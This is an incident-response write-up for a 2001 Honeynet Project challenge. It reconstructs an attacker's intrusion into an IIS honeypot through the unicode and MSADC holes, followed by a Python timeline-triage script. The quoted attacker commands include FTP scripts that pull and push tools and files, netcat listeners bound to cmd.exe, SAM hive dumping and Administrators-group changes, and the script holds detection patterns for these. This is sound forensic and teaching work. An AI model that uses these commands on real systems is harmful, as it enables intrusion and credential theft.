Project Honeynet - Scan of the Month - April 2001
Reconstructed Timeline
Submitted by: Tom.Vandepoel@ubizen.com
-------------------------------------------------

Legend:

T (172.161.1.106): the victim of the intrusion, lab.wiretrip.net
X (213.116.251.162): the primary source of the intrusion
Y (202.85.60.156): the secondary source of the intrusion
F (204.42.253.18): ftp.nether.net, indirectly involved in the intrusion

Phase 1 - Probing for vulnerabilities
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

After surfing around a bit, the intruder decides to try the unicode
vulnerability. (S)he succeeds in viewing boot.ini and so (s)he happily
proceeds to try the MSADC vulnerability, which allows remote command
execution. (S)he uses this ability to create a file, then uses the unicode
vulnerability to verify that this indeed worked.

14:25:22 X:1765 -> T:80 view (unicode) on /guest/default.asp: boot.ini
14:27:08 X:1771 -> T:80 exec (msadc): 'echo werd >> c:\fun'
14:27:15 X:1772 -> T:80 view (unicode): fun

Phase 2 - Transfer of tools onto the target
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Next, the intruder wants to transfer some of his/her tools onto T, to
elevate his/her privileges further. (S)he does this by using the blind
command execution capability to compose an ftp client script, piece by
piece (through 'echo'). When executed, this ftp script will make T
retrieve the tools from a remote ftp server. However, the intruder is
very clumsy and has to do this over a few times. The first attempt tries
to use the server 'ftp.nether.net', but the login fails. The intruder
does not know this, and (s)he tries to execute one of the tools, which
fails.
14:32:51 X:1778 -> T:80 exec (msadc): creates ftp script ftpcom through 'echo'
14:33:33 X:1791 -> T:80 exec (msadc): 'ftp -s:ftpcom ftp.nether.net'
14:33:34 T:3135 -> F:21 first unsuccessful login to ftp.nether.net
14:33:50 X:1793 -> T:80 exec (msadc): 'pwdump >> newpass', which fails

Retry with the same ftp server:

14:34:00 X:1795 -> T:80 exec (msadc): new ftp script ftpcom2

--- ftpcom2 ---
user johna2k hacker2000
put newpass
quit
--- ftpcom2 ---

14:34:28 X:1803 -> T:80 exec (msadc): 'ftp -s:ftpcom2 ftp.nether.net'
14:34:29 T:3138 -> F:21 second ftp attempt, fails

Next, the intruder tries to do this interactively, to the intruder's own
machine. At this time, (s)he probably has a sniffer running to see if the
connection is actually getting through. Seeing the packets, the intruder
is confident that the session is not blocked by a firewall.

14:34:47 X:1808 -> T:80 exec (msadc): 'ftp 213.116.251.162'
14:34:47 T:3139 -> X:21 third, failed ftp connection

Full of new hope, (s)he tries again. This is done 3 times, but fails each
time. Confused kiddie that (s)he is, (s)he jumbles up the syntax.

14:36:30 X:1812 -> T:80 exec (msadc): (s)he overwrites the ftp script ftpcom

--- ftpcom ---
open 213.116.251.162
johna2k
hacker2000
get samdump.dll
get pdump.exe
get nc.exe
quit
--- ftpcom ---

14:37:22 X:1832 -> T:80 exec (msadc): 'ftp -s:ftpcom'
14:38:29 X:1842 -> T:80 exec (msadc): starts a new ftp script, sasfile

--- sasfile ---
johna2k
haxedj00
get pdump.exe
get sampdump.dll
get nc.exe
quit
--- sasfile ---

14:38:42 T:80 -> X:1854 exec (msadc): 'ftp -s:sasfile'
14:40:11 T:80 -> X:1857 exec (msadc): 'open 213.116.251.162' ???
14:40:13 T:80 -> X:1859 exec (msadc): again recreates script 'sasfile'

--- sasfile ---
johna2k
haxedj00
get pwdump.exe
get sampdump.dll
get nc.exe
quit
--- sasfile ---

14:40:25 X:1871 -> T:80 exec (msadc): 'ftp -s:sasfile', probably fails again

Frustrated, (s)he switches to unicode command execution.
(S)he first copies cmd.exe to the msadc directory, to make his/her life
easier. When (s)he's done this, (s)he continues his/her antics and finally
succeeds in transferring the tools. What I don't understand is that the
ftp server uses ASCII mode instead of binary mode, but the tools do work.

14:41:02 X:1874 -> T:80 copy (unicode) cmd.exe to /msadc/cmd1.exe
14:41:09 X:1875 -> T:80 exec (unicode) start creating ftp script ftpcom

--- ftpcom ---
open X
johna2k
haxedj00
get nc.exe
get pwdump.exe
get sampdump.dll
quit
--- ftpcom ---

14:42:21 X:1885 -> T:80 exec (unicode): 'ftp -s:ftpcom'
14:42:21 T:3142 -> X:21 ftp transfer of tools, ascii mode: nc.exe, pdump.exe, samdump.dll

Phase 3 - Interactive control
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Having transferred netcat onto the system, (s)he forks a netcat listener
and connects to it. (S)he then starts to scout around a bit. Apparently,
(s)he is accustomed to unix, because (s)he mixes up ls/dir and rm/del.

14:42:42 X:1887 -> T:80 launch (unicode): nc -l -p+6969 -e cmd1.exe
14:42:47 X:1888 -> T:6969 incoming NC cmd.exe session: see nc1.log

Phase 4 - Privilege elevation
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Not happy with the interactive logon as IUSR_KENNY, (s)he tries to gather
more privileges. Knowing that (s)he can execute commands as SYSTEM through
the MSADC hole, (s)he uses that capability to bootstrap his/her
interactive session up to more privileges. First, (s)he tries to use pdump
(which (s)he downloaded) to dump the password hashes from the registry,
but this apparently fails.
14:43:52 X:1891 -> T:80 exec (msadc): 'samdump >> yay.txt'
14:44:36 X:1893 -> T:80 exec (msadc): 'pdump >> yay.txt'
14:45:55 X:1901 -> T:80 exec (msadc): 'pdump >> c:\yay.txt'
14:46:08 X:1888 -> T:6969 interactive (netcat): 'type yay.txt'
14:47:48 X:1922 -> T:80 exec (msadc): 'pdump >> yay2.txt'
14:47:55 X:1924 -> T:80 exec (msadc): 'net session >> c:\yay2.txt'
14:48:59 X:1888 -> T:6969 interactive (netcat): 'type yay2.txt'

Next, (s)he tries to gather more info through 'net' commands.

14:49:54 X:1930 -> T:80 exec (msadc): 'net users >> heh.txt'
14:50:00 X:1932 -> T:80 exec (msadc): 'net users >> c:\heh.txt'
14:50:10 X:1888 -> T:6969 interactive (netcat): 'type heh.txt'

Probably struck with a sudden burst of creativity, (s)he leaves a helpful
message for the owner of the server.

14:50:51 X:1888 -> T:6969 interactive (netcat): 'echo Hi, i know that this is a lab server, but patch the holes! :-) >>README.NOW.Hax0r'

Next, the intruder tries to use 'net' commands to directly change the
privileges of the IUSR account. First, by adding the IUSR/IWAM users to
the "Domain Admins" group.

14:51:31 X:1888 -> T:6969 interactive (netcat): 'net group...'
14:53:27 X:1888 -> T:6969 interactive (netcat): 'net users'
14:53:40 X:1940 -> T:80 exec (msadc): 'net localgroup Domain Admins IWAM_KENNY /ADD'
14:54:03 X:1943 -> T:80 exec (msadc): 'net localgroup Domain Admins IUSR_KENNY /ADD'

This change in permissions is unsuccessful, because "Domain Admins" is not
a local group. Next, the intruder tries to add IUSR/IWAM to the
"Administrators" group, which is local.

14:55:45 X:1888 -> T:6969 interactive (netcat): 'net localgroup administrators'

--- output ---
Members
-----------------------------------------------------------------------------
Administrator
Domain Admins
The command completed successfully.
--- output ---

14:56:05 X:1946 -> T:80 exec (msadc): 'net localgroup Administrators IUSR_KENNY /ADD'
14:56:17 X:1948 -> T:80 exec (msadc): 'net localgroup administrators IWAM_KENNY /ADD'
14:56:34 X:1888 -> T:6969 interactive (netcat): 'net localgroup administrators'

--- output ---
Members
-----------------------------------------------------------------------------
Administrator
Domain Admins
IUSR_KENNY
IWAM_KENNY
The command completed successfully.
--- output ---

(S)he tries to run pdump again, presumably with administrator privileges,
but it fails.

14:58:08 X:1888 -> T:6969 interactive (netcat): 'pdump'

For an unknown reason, another account is created, maybe to test the
ability to create user accounts.

14:59:02 X:1956 -> T:80 exec (msadc): 'net user testuser UgotHacked /ADD'
14:59:18 X:1958 -> T:80 exec (msadc): 'net localgroup Administrators testuser /ADD'

Pdump is removed; at this point the intruder probably gives up on this
method of gaining more privileges.

15:05:27 X:1888 -> T:6969 interactive (netcat): 'del pdump.exe' and 'del samdump.dll'

A backup dump of the registry hive is made through rdisk, but this only
succeeds after (s)he gets the syntax right. (S)he needs to run this
through MDAC (as SYSTEM) to have enough privileges for this.

15:05:51 X:1888 -> T:6969 interactive (netcat): 'rdisk -s/'
15:06:32 X:1964 -> T:80 exec (msadc): 'rdisk -/s'
15:06:38 X:1966 -> T:80 exec (msadc): 'rdisk -s'
15:06:42 X:1968 -> T:80 exec (msadc): 'rdisk'
15:07:04 X:1970 -> T:80 exec (msadc): 'rdisk -s'
15:07:10 X:1972 -> T:80 exec (msadc): 'rdisk -s/'
15:07:32 X:1974 -> T:80 exec (msadc): 'rdisk /s-'
15:07:50 X:1976 -> T:80 exec (msadc): 'rdisk /s-'
15:08:32 X:1979 -> T:80 exec (msadc): 'rdisk /s-'
15:08:36 X:1981 -> T:80 exec (msadc): 'type c:\winnt\repair\sam._ >> C:\har.txt'
15:08:42 X:1888 -> T:6969 interactive (netcat): 'dir' shows sam._ was finally rewritten

C:\WINNT\repair>dir
 Volume in drive C has no label.
 Volume Serial Number is 8403-6A0E

 Directory of C:\WINNT\repair

02/04/01  07:07a                    .
02/04/01  07:07a                    ..
02/04/01  07:07a           827,392  $$hive$$.tmp
10/13/96  07:38p               438  autoexec.nt
11/26/00  12:34p             2,510  config.nt
02/04/01  07:07a            16,275  default._
02/04/01  07:07a            14,946  ntuser.da_
02/04/01  07:07a             5,327  sam._
02/04/01  07:07a            10,111  security._
11/26/00  06:54p            50,405  setup.log
02/04/01  07:07a           686,053  software._
              11 File(s)      1,613,457 bytes
                          1,689,496,576 bytes free

(S)he tries to view this binary file, but this messes up the terminal and
so (s)he has to kill the session:

15:10:11 X:1888 -> T:6969 first NC session ends

(S)he tries to fork a new netcat listener on the same port, but (s)he has
problems connecting, probably because the socket is still in use.

15:10:42 X:1987 -> T:80 exec (unicode) 'nc -l -p 6969 -e cmd1.exe'
15:10:46 X:1988 -> T:6969 failed (RST) incoming netcat session
15:10:54 X:1989 -> T:6969 failed again

(S)he tries again on another port and succeeds in re-establishing an
interactive shell.

15:11:19 X:1992 -> T:80 exec (unicode) nc -l -p 6968 -e cmd1.exe
15:11:24 X:1993 -> T:6968 incoming NC cmd.exe session: see nc2.log

(S)he copies the SAM backup dump (s)he produced earlier to the web root,
so (s)he's able to download it.

15:12:22 X:1993 -> T:6968 interactive (netcat): copies c:\har.txt to inetpub
15:12:32 X:1995 -> T:80 get /har.txt (sam._)

(S)he tries to delete that file from the web root, both via his/her
interactive shell and through MDAC command execution (as SYSTEM), but
this fails.

15:15:23 X:1998 -> T:80 exec (msadc): 'del c:\inetpub\wwwroot\har.txt'
15:15:35 X:2000 -> T:80 exec (msadc): 'del c:\inetpub\wwwroot\har.txt'

The intruder looks around some more, but finds nothing of interest and
disconnects. (S)he probably fires up l0phtcrack to have a go at the SAM
dump file.
15:16:32 T:6968 -> X:1993 second nc session ends

(S)he tries to fork a new netcat listener but again has to pick another
port:

15:16:41 X:2002 -> T:80 exec (unicode) nc -l -p 6968 -e cmd1.exe
15:19:05 X:2007 -> T:80 exec (unicode) nc -l -p 6868 -e cmd1.exe

Strangely, this third netcat session originates from a different IP:

15:20:44 Y:1345 -> T:6868 incoming NC cmd.exe: nc3.log

The intruder scouts around a bit more and shows particular interest in
the "exploits" directories. (S)he also leaves a message for RFP.

15:25:03 Y:1345 -> T:6868 types 'echo best honeypot i've seen till now :) > rfp.txt'

(S)he checks to see if the old message is still there:

15:25:49 X:2022 -> T:80 view (unicode): boot.ini and READ.NOW.hax0r
15:26:06 X:2023 -> T:80 view (unicode): READ.me.NOW.hax0r

And for an unknown and, to my knowledge, useless reason (s)he changes the
IWAM account password:

15:34:11 X:2082 -> T:80 exec (msadc): 'net user IWAM_KENNY Snake69Snake69'

Phase 5 - Bragging time
>>>>>>>>>>>>>>>>>>>>>>>

Next, we see the attacker creating a file in the web root, called
test.txt, containing the text 'This can't be true'.

15:36:02 X:2091 -> T:80 get /test.txt, result "this can't be true"
15:37:46 X:2104 -> T:80 get /test.txt, not modified response

Next, we see access to this file from many different IP addresses. My
guess is that (s)he's bragging to his/her friends on IRC and referring to
the URL http://lab.wiretrip.net/test.txt.

212.187.36.4     15:34
213.46.45.28     15:37
213.48.120.242   15:38
194.126.101.110  15:38
198.142.92.196   15:39
213.93.39.186    15:39
24.43.44.7       15:39
62.153.22.63     15:42
213.245.4.107    15:44
62.153.22.63     15:46
204.137.229.4    15:52
64.219.144.66    15:56
213.64.51.77     15:59
193.253.209.220  16:18

Phase 6 - Cleanup
>>>>>>>>>>>>>>>>>

After transferring what (s)he probably hopes is a new zer0-day whisker (it
is just 1.4, I checked), (s)he is about to say bye.
15:50:27 X:2150 -> T:80 exec (unicode): 'copy c:\winnt\system32\cmd.exe cmd1.exe'
15:50:37 X:2151 -> T:80 exec (unicode): construct ftp script ftpcom

--- ftpcom ---
open X
johna2k
haxedj00
put c:\wiretrip\whisker.tar.gz
quit
--- ftpcom ---

15:51:29 X:2177 -> T:80 exec (unicode): 'ftp -s:ftpcom'
15:51:29 T:3158 -> X:21 ftp transfer of 'stolen' whisker, ascii

For some unknown reason (s)he tries to fork another netcat listener and
tries to connect to it, but fails:

15:51:52 X:2178 -> T:80 exec (unicode) nc -l -p 6969 -e cmd1.exe
15:51:55 X:2179 -> T:6969 incoming netcat, but immediately RST
15:52:20 T:6868 -> 202.85.60.156:1345 previous netcat session ends

(S)he cleans up the ftp script and leaves the readers of project.honeynet
to ponder the snort droppings:

15:54:13 X:2187 -> T:80 exec (unicode) del ftpcom
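The timeline above was reconstructed by hand. As an added example (not part of the original submission), the Python below parses lines written in that same "HH:MM:SS src:port -> dst:port note" notation, resolves the legend letters to the addresses given in the legend, and tags each event for triage (web command execution, backdoor listener, privilege change, credential file handling); the sample lines are constructed from the write-up's own entries, and the tag names and rules are my own.

```python
import re
from collections import Counter

# Constructed sample in the write-up's notation (not the original capture)
SAMPLE = """\
14:27:08 X:1771 -> T:80 exec (msadc): 'echo werd >> c:\\fun'
14:42:42 X:1887 -> T:80 launch (unicode): nc -l -p 6969 -e cmd1.exe
14:42:47 X:1888 -> T:6969 incoming NC cmd.exe session: see nc1.log
14:56:05 X:1946 -> T:80 exec (msadc): 'net localgroup Administrators IUSR_KENNY /ADD'
15:08:36 X:1981 -> T:80 exec (msadc): 'type c:\\winnt\\repair\\sam._ >> C:\\har.txt'
15:12:32 X:1995 -> T:80 get /har.txt (sam._)
"""

# Legend letters -> addresses, as listed at the top of the write-up
LEGEND = {"T": "172.161.1.106", "X": "213.116.251.162",
          "Y": "202.85.60.156", "F": "204.42.253.18"}

EVENT = re.compile(r"^(\d\d:\d\d:\d\d) ([\w.]+):(\d+) -> ([\w.]+):(\d+) (.*)$")

# Triage rules (assumed, my own): most severe first, matched on the note text
RULES = [
    ("priv-escalation", re.compile(r"net localgroup administrators\b.*/add", re.I)),
    ("credential-dump", re.compile(r"pdump|samdump|sam\._", re.I)),
    ("backdoor-listener", re.compile(r"\bnc -l -p\s*\d+", re.I)),
    ("backdoor-session", re.compile(r"incoming (nc|netcat)\b", re.I)),
    ("web-rce", re.compile(r"\((msadc|unicode)\)", re.I)),
]

def parse_event(line):
    """Split one timeline line into fields; resolve legend letters to IPs."""
    m = EVENT.match(line.strip())
    if not m:
        return None            # not a timeline entry (prose, script body, ...)
    t, src, sport, dst, dport, text = m.groups()
    return {"time": t, "src": LEGEND.get(src, src), "sport": int(sport),
            "dst": LEGEND.get(dst, dst), "dport": int(dport), "text": text}

def classify(event):
    """Return every matching tag for an event, most severe first."""
    return [tag for tag, rx in RULES if rx.search(event["text"])]

def triage(text):
    """Parse all lines, attach tags, and count events per destination port."""
    events = [e for e in map(parse_event, text.splitlines()) if e]
    for e in events:
        e["tags"] = classify(e)
    ports = Counter(e["dport"] for e in events)   # 80 = web hole, 69xx = netcat
    return events, ports
```

Running triage() over a full reconstructed timeline gives a quick view of which channel (web hole versus netcat shell) each tagged action went through, which is what separates the SYSTEM-level MSADC actions from the IUSR_KENNY-level shell actions in the write-up.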